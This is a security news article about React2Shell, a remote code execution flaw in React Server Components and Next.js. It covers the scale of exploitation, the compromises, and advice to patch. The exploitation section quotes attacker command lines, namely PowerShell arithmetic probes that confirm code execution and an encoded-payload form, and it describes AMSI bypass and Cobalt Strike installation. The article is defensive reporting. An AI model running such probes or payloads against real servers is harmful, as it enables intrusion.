When Cloudflare pushed an emergency Web Application Firewall update to block a newly disclosed React Server Components flaw, the fix accidentally caused a major outage. The reason behind this rushed patch was far more serious. The vulnerability, known as React2Shell (CVE-2025-55182), is a critical remote code execution flaw that attackers began exploiting within hours of its public disclosure. Since the bug affects React Server Components and frameworks built on top of them, including Next.js, the potential impact is huge.
What is React2Shell?
React2Shell is an unauthenticated remote code execution vulnerability. It originates from unsafe deserialization inside React Server Components. Because of this, an attacker only needs one malicious HTTP request to run arbitrary commands on a vulnerable server.
Any app running React Server Components, especially Next.js apps, is at risk unless developers update, rebuild, and redeploy their applications.
On December 4, a security researcher released a working proof-of-concept. This helped defenders understand the flaw better, but it also accelerated attacks. Automated scanners, botnets, and threat actors immediately started probing the internet for unpatched servers.
By now, multiple security teams have confirmed massive scanning activity targeting this flaw. Shadowserver’s global scan detected 77,664 vulnerable IP addresses, with around 23,700 in the United States alone. These numbers represent only public-facing servers, so the real exposure may be even larger.
Researchers confirmed exposure by sending a crafted HTTP request and analysing the server’s response. If the server responded in a specific way, it meant the target was vulnerable.
GreyNoise also tracked over 180 unique IP addresses actively attempting to exploit the bug within a 24-hour window. Most of this traffic is automated and distributed across countries such as China, the Netherlands, the United States, and Hong Kong.
Palo Alto Networks revealed that over 30 organisations have already been compromised. Attackers exploited React2Shell to:
- Run arbitrary commands
- Perform reconnaissance
- Attempt to steal AWS configuration and credential files
Some intrusions have been linked to state-associated Chinese threat actors, including groups known for initial access operations and long-term espionage.
How attackers are exploiting the flaw
Most attackers begin with harmless-looking PowerShell math commands, such as:
powershell -c "40138*41979"
powershell -c "40320*43488"These commands do not raise suspicion, but they confirm remote code execution on the server. Once confirmed, attackers switch to base64-encoded PowerShell payloads:
powershell -enc <base64>These payloads often download further scripts directly into memory. In some cases, the scripts disable Windows AMSI (Anti-Malware Scan Interface) to bypass endpoint security tools.
GreyNoise and VirusTotal reports show attackers installing Cobalt Strike beacons, giving them long-term access inside networks.
Because the vulnerability is easy to exploit and already weaponised, companies worldwide are racing to patch and redeploy their applications. Even Cloudflare’s own emergency mitigation led to accidental downtime, showing how urgent and critical the situation has become. CISA has included CVE-2025-55182 in its Known Exploited Vulnerabilities (KEV) catalog. US federal agencies are required to patch it by December 26, 2025.
If you use React Server Components or frameworks that depend on them, you should update to the latest React version, rebuild and redeploy your application. Check logs for any suspicious PowerShell or shell commands and review outbound traffic patterns to look for Cobalt Strike-like behaviour.
